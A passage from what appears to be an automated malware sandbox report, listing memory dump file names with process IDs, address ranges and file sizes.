    Filesize

    8KB

  • memory/1888-135-0x00000000008A0000-0x00000000010CC000-memory.dmp
    Filesize

    8.2MB

  • memory/1888-133-0x00000000008A14C0-mapping.dmp
  • memory/1888-132-0x00000000008A0000-0x00000000010CC000-memory.dmp
    Filesize

    8.2MB

  • memory/1888-131-0x00000000008A0000-0x00000000010CC000-memory.dmp
    Filesize

    8.2MB

  • memory/1928-67-0x0000000000000000-mapping.dmp
  • memory/1956-105-0x0000000074920000-0x0000000074BC6000-memory.dmp
    Filesize

    2.6MB

  • memory/1956-84-0x0000000000000000-mapping.dmp
  • memory/1956-101-0x0000000074DC0000-0x0000000074E7F000-memory.dmp
    Filesize

    764KB

  • memory/1956-107-0x0000000074830000-0x0000000074850000-memory.dmp
    Filesize

    128KB

  • memory/1956-108-0x0000000000F40000-0x000000000134F000-memory.dmp
    Filesize

    4.1MB

  • memory/1956-106-0x0000000074850000-0x0000000074914000-memory.dmp
    Filesize

    784KB

  • memory/1956-102-0x0000000074830000-0x0000000074850000-memory.dmp
    Filesize

    128KB

  • memory/1956-104-0x0000000074DC0000-0x0000000074E7F000-memory.dmp
    Filesize

    764KB

  • memory/1956-103-0x0000000000F40000-0x000000000134F000-memory.dmp
    Filesize

    4.1MB